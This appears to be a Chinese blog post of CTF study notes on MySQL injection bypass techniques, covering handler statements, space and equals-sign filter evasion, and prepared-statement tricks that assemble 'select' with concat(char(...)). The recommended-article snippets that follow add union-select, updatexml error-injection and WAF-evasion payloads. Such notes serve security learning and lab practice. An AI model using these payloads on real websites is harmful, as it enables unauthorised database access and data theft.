SQL注入相关语句及绕过

最新推荐文章于 2024-08-28 13:44:19 发布
最新推荐文章于 2024-08-28 13:44:19 发布
阅读量324 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_51313108/article/details/119728326
版权
本文详细讲解了SQL注入中的show、rename、alter操作绕过handler的方法,包括利用空格、like和半个flag进行绕过,以及预处理命令的利用和参数传递。重点介绍了如何通过concat拼接绕过select过滤,揭示了攻防实战中的关键技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

SQL注入相关语句及绕过

handler语句

handler table_name open:打开一个表的会话
handler table_name read first:读取第一行数据
handler table_name read next:读取第二行数据
handler table_name close:关闭会话

show和rename

show语句

show databases 显示当前数据库名称
show tables 显示当前数据库中所有的表名称
show columns from table_name 显示指定表中的数据类型信息

rename语句

rename table table1 to table2 将table1的名称改为table2

alter语句

alter table table_name add column_name datatype 在指定的表中添加指定的列
alert table table_name change column_name data datatype 指定的表中修改指定的列
default:DEFAULT 约束用于向列中插入默认值。
如果没有规定其他的值,那么会将默认值添加到所有的新记录。

过滤空格

空格被过滤用/**/来绕过;
还可以使用括号来绕过() select(database())空格处要有)或(其中一个
例如(select(group_concat(password))from(H4rDsq1))

过滤=

等号=被过滤可以用like来绕过

flag只有一半

flag只被显示出一半
select left(name,25) from table_name
select right(name,25) from table_name
最后得到的结果记得把重叠的部分删除

预处理命令绕过

预处理命令绕过在一次堆叠注入时见过强网杯 2019 随便注。大神的writeupBUUCTF 随便注 WP。本题过滤了select所以可以利用concat拼接字符串然后用预处理命令来绕过。
预处理命令

PREPARE sqla from '[my sql sequece]';   //预定义SQL语句
EXECUTE sqla;  //执行预定义SQL语句
(DEALLOCATE || DROP) PREPARE sqla;  //删除预定义SQL语句

预处理命令参数变量来传递

set @sql=concat(char(115,101,108,101,99,116)," * from \`1919810931114514\`")
PREPARE sqlb from @sql  //定义预处理命令
EXECUTE sqlb  //执行预处理命令
(DEALLOCATE || DROP) PREPARE sqlb; // 删除预处理命令
实验吧web之简单的sql注入1
The Road Of Sec
05-06 8640
0x.部分题解 一、通过加英文单引号1‘ ,检测到存在注入:   php?id=1   二、按常规步骤输入1 and 1=1和1 and 1=2的时候,发现报了“SQLi deteced!”而无法查询:php?1 and 1=1  php?1 and 1=2       那么,去掉空格输入1and1=1和1and1=2呢?       确定是过滤了空格!
SQL注入技术详解与过滤绕过方法
Cyc1e的博客
11-07 1943
SQL注入攻击是严重的安全威胁,可能导致数据库数据泄露或篡改。使用参数化查询或ORM框架,避免直接拼接SQL语句。对用户输入进行严格过滤和验证,限制输入的格式和范围。定期更新依赖库,修复已知的安全漏洞。然而,攻击者可能通过编码、注释、拆分关键字等方式绕过简单的防护机制。因此,开发者应使用多层次的防御方法,并定期对应用进行安全测试。
CTF Show sql注入
xian653617125的博客
04-06 841
171 题目已经给出了拼接的语句是带有单引号的所以我们要闭合并且利用-- 或者%23注释掉后面的单引号 1' order by 3-- A 首先查询字段有多少,我试了2,3,4,到4的时候端口异常所以判断为三个字段 1' union seLect 1,2,3 -- 1' union select 1,database(),3 -- A 然后利用sql语句确定回显点,知道回显点后我们可以利用database()函数来返回数据库的名称。 1' union select 1,2,table_na
CTF-show-SQL注入-1
qq_52696970的博客
03-24 287
From: https://blog.youkuaiyun.com/qq_61237064/article/details/121421239 https://blog.youkuaiyun.com/weixin_48083470/article/details/119034415 CTF-show-sql注入1、web1712、web1723、web1734、web174 1、web171 在网页中给出的用户表中可以看到ID=3后,数据无法显示,这说明有三个字段数 判断字段后,首先查询数据库名字: ctfshow_web 1'
ctf.showSQL注入(web171-web253)
wanan的博客
09-30 1万+
ctf.showSQL注入(web171-web253)
mysql 绕过select报错_sql绕过2
weixin_29258865的博客
01-26 421
0x00 sql注入理解SQL注入能使攻击者绕过认证机制,完全控制远程服务器上的数据库。 SQL是结构化查询语言的简称,它是访问数据库的事实标准。目前,大多数Web应用都使用SQL数据库来存放应用程序的数据。几乎所有的Web应用在后台 都使用某种SQL数据库。跟大多数语言一样,SQL语法允许数据库命令和用户数据混杂在一起的。如果开发人员不细心的话,用户数据就有可能被解释成命令, 这样的话,远程用户...
SQL注入技巧之显注与盲注中过滤逗号绕过详析
09-09
过滤逗号是安全领域常见的一种防御SQL注入的方法,因为SQL语句中逗号通常用于分隔不同的数据列。然而,有经验的攻击者能够通过各种技巧绕过这些过滤措施。在过滤逗号的环境下,攻击者可以使用特定的SQL技巧来执行...
高级SQL注入:混淆和绕过.pdf
03-21
高级SQL注入:混淆和绕过 本文总结了高级SQL注入技术,包括混淆和绕过技术,旨在帮助安全研究人员和开发者更好地理解和防止SQL注入攻击。下面是本文中提到的关键知识点: 1. 过滤规避(Mysql):通过使用特殊的SQL...
SQL注入绕过的技巧总结
09-09
本文主要探讨了三种SQL注入绕过技术:引号绕过、逗号绕过以及比较符(<, >)绕过,这些都是在SQL注入措施下仍能实施攻击的有效手段。 首先,**引号绕过** 是针对那些过滤了单引号(')或双引号(")的系统。...
SQL 注入之 WAF 绕过
2301_77160226的博客
08-28 1570
SQL 注入攻击是一种严重的安全威胁,而 WAF 是防范 SQL 注入攻击的重要手段之一。然而,攻击者也在不断寻找方法来绕过 WAF,从而成功实施 SQL 注入攻击。为了防范 WAF 绕过,我们需要采取持续更新 WAF 规则、多层面防御、安全培训和定期安全审计等措施,形成一个强大的安全防护体系,保护 Web 应用程序的安全。同时,我们也需要不断关注网络安全领域的最新动态,及时了解新的攻击技术和防范方法,以提高我们的安全防护能力。
SQL注入绕过
anlalu233的博客
10-18 622
注释符号绕过 大小写绕过 双写绕过 编码绕过 <>绕过 对空格的绕过 对or/and的绕过 对等号=的绕过 对单引号的绕过 对逗号的绕过 过滤函数绕过 ...
随时补充SQL注入绕过
weixin_44722125的博客
05-13 808
做CTF题的时候才发现自己会的注入姿势太少了 专开一篇随时补充sql注入 1.绕过空格(注释符/* /,%a0):   两个空格代替一个空格,用Tab代替空格,%a0=空格: %20 %09 %0a %0b %0c %0d %a0 %00 /**/ /!/ 最基本的绕过方法,用注释替换空格: / 注释 */ 使用浮点数: select * from users where id=8E0unio...
二次注入与报错注入简单了解
现代鲁滨逊的博客
12-14 390
文章目录二次注入报错注入wp 二次注入 报错注入 十种MySQL报错注入 wp test"^updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))),1)# password=aaa&email=bbb&username=a"||(updatexml(0x7e,concat(7,(select(group
mysql 绕过select报错_Web安全之SQL注入(原理,绕过,防御)
weixin_36193839的博客
02-18 822
首先了解下Mysql表结构mysql内置的information_schema数据库中有三个表非常重要1 schemata:表里包含所有数据库的名字2 tables:表里包含所有数据库的所有的表,默认字段为table_name3 columns:三个列非常重要TABLE_SCHEMA:数据库名TABLE_NAME:表名COLUMN_NAME:字段名SQL注入原理:web应用没有对用户输入的数据进行...
报错注入显示不全问题
矜庄寂寥的博客
12-18 4603
目录介绍实验环境解决方法0x010x02 方法一(利用limit子句)0x02 方法二(使用mid函数)0x03 方法三(sqlmap O(∩_∩)O) 介绍 在sql主任中使用 updatexml extractvalue exp floor函数进行报错注入时,有时会出现由于数据的数量过多导致无法一次性显示所有内容,所以鄙人就去寻找了几种解决方法 实验环境 本次实验使用的是github上开源的sqli-labs训练靶场 地址:https://github.com/Audi-1/sqli-labs 解决
SQL注入1——显注(重学)
qq_52263650的博客
11-01 1309
SQL注入,大一学的了,摆了这么久,在学一遍吧
SQL注入教程
weixin_51047454的博客
03-17 1万+
sql注入教程
绕过WAF的SQL注入语句
热门推荐
煜铭2011
05-03 1万+
0x00前言 现在的网络环境往往是WAF/IPS/IDS保护着Web 服务器等等,这种保护措施往往会过滤挡住我们的SQL注入查询链接,甚至封锁我们的主机IP,所以这个时候,我们就要考虑怎样进行绕过,达到注入的目标。因为现在WAF/IPS/IDS都把sqlmap 列入黑名单了,呵呵!但是本文基于手工进行绕过注入测试,介绍至今仍然实用有效的技巧,以下策略在特定的环境能够成功绕过,具体是否绕过,请仔...
mysql的特定查询语句handler
m0_51607644的博客
02-22 652
1、说明 handler语句不具备select语句的所有功能。handler是mysql专用的语句,没有包含到SQL标准中。它每次只能查询1次记录,而select可以根据需要返回多条查询结果。资料上说它可以降低优化器对于SQL语句的解析与优化开销,从而提升查询性能。 2、handler语法 HANDLER table_name OPEN [ [AS] a] HANDLER table_name READ index_name { = | <= | >= | < | > } (v
手工sql注入常用sql语句绕过
最新发布
12-27
### 手工SQL注入绕过安全措施的常用技巧 #### 使用特殊字符和编码混淆WAF检测 某些Web应用防火墙(WAF)可能无法正确解析特定模式下的输入,从而允许恶意查询通过。例如,在MySQL环境中,`%20union%20a11%23%0a%20select%201,2,3%23`这样的URL编码可以用来规避基本的过滤机制[^1]。 ```sql http://example.com/vuln.php?id=1 UNION ALL SELECT NULL,NULL,'<script>alert(1)</script>' -- ``` 此代码片段展示了如何利用UNION操作符来附加额外的选择语句,并且使用注释符号(`--`)结束原始查询以确保后续部分不会引起语法错误。 #### 利用路径中的关键词触发白名单规则 当目标站点配置有基于URL路径的安全策略时,攻击者可以通过构造特殊的请求地址使这些防护失效。比如向URI中加入像`/admin/`, `/manage/`之类的子串可能会让WAF认为这是合法访问而放行[^2]: ```plaintext http://targetsite/path/to/script?param=value&fakepath=admin/ ``` 上述链接里的`fakepath=admin/`参数并没有实际作用于应用程序逻辑处理过程之中;相反地,它是为了迎合WAF内部预设条件所设计出来的欺骗手段之一。 #### 替代关键字实现相同功能 为了避免被简单的字符串匹配型防御工具拦截,还可以尝试替换标准SQL命令的关键字形式。例如将`SELECT`变为`SeLeCt`或采用其他大小写组合方式书写,甚至借助数据库特有的函数特性达到目的。 ```sql http://vulnerable-site/search?q=test'/**/or/**/'1'%3d'1 ``` 这里采用了多层嵌套注释的方式(即`/**/`),使得一些较为基础版本的WAF难以有效识别并阻止该类型的注入行为。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值